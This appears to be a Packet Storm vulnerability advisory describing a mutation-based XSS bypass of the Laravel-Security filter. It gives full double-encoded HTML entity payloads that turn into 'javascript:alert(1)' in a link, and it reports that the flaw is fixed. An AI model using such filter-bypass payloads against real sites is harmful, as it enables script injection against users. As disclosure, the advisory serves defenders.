accept no compromises

Lavarel-Security XSS Filter Bypass

Lavarel-Security XSS Filter Bypass
Posted Apr 29, 2014
Authored by Rafay Baloch

Lavarel-Security cross site scripting filter suffers from a bypass vulnerability.

tags | exploit, xss, bypass
MD5 | 82d3e66a425cd7e997c924715a185f58

Lavarel-Security XSS Filter Bypass

Change Mirror Download
*#Product: Lavarel-Security XSS Filter Bypass*
*#Vulnerability: Mutation Based XSS Bypass *
*#Impact: Medium/High*
*#Authors: Rafay Baloch *
*#Company: RHAinfoSEC *
*#Website: http://rhainfosec.com
*#Status: Fixed*

*=========*
*Description*
*=========*

Laravel Security is a port of the security class from Codeigniter 2.1 for
Laravel 4.1. It relies upon a blacklist approach to filter out common
malicious inputs.

*=========*
*Vulnerability*
*==========*

The vulnerability lies in the fact that the XSS filter was decoding HTML
entities, therefore based upon this fact it was
possible to construct a payload that would successfully bypass the
filtering mechanisms and execute javascript.

*=============*
*Proof of concept*
*=============*

During intial test the following input was provided:

<a
href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>

The filter decodes the HTML entities and hence the attack was being
blocked.

After Decoding:

<a href="javascript:alert(1)">Clickhere</a>

Next, we double encoded the entities:

<a
href="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a>

And since the filter would decode the entities once, we are left with the
following:


<a
href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>

Which is perfectly a valid syntax inside of href context and would execute
javascript.

*===*
*Fix*
*===*

The vulnerability has been fixed, the latest version doesn't decode HTML
entites and hence the attack is mitigated.


*==========*
*References*
*==========*

https://github.com/GrahamCampbell/Laravel-Security/issues/10#issuecomment-37816413

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close